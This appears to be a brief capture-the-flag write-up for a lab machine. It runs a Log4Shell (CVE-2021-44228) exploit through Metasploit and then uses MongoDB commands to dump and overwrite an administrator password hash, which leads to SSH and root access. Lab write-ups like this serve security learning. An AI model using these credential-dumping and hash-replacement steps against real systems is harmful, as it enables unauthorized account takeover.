Started with a basic nmap scan as always. There were ports 22,8080,8443,8880 open and port 6789 filtered.
Noticed that port 8080 redirects to port 8443 that has a log in page.
Software is vulnerable for log4j (CVE-2021-44228) exploit. Im going to use metasploit to get in.
I got it. Found user.txt in /home/michael **************


ps aux | grep mongo
unifi         67  0.4  4.1 1100676 84912 ?       Sl   05:57   0:21 bin/mongod --dbpath /usr/lib/unifi/data/db --port 27117 --unixSocketPrefix /usr/lib/unifi/run --logRotate reopen --logappend --logpath /usr/lib/unifi/logs/mongod.log --pidfilepath /usr/lib/unifi/run/mongod.pid --bind_ip 127.0.0.1
unifi       2325  0.0  0.0  11468  1056 ?        S    07:17   0:00 grep mongo



mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"

"_id" : ObjectId("61ce278f46e0fb0012d47ee4"),
        "name" : "administrator",
        "email" : "administrator@unified.htb",
        "x_shadow" : "$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.",


I changed password hash with: 
mongo --port 27117 ace --eval 'db.admin.update({"_id": ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$k9fAqHblM4FXb8Ck$d0wJ9I5B0iDjELuuJrNx9gr3tB/jxrbKGxTCdLohRAUvOGsSV9Fy0Vyh7GlvBHiOqW8fU2vZvKKubRaP26UrR/"}})'  

Then confirmed that the password was changed with: 
mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"

In the settings of a dashboard is username & password for ssh connection.

root.txt in /root ********************
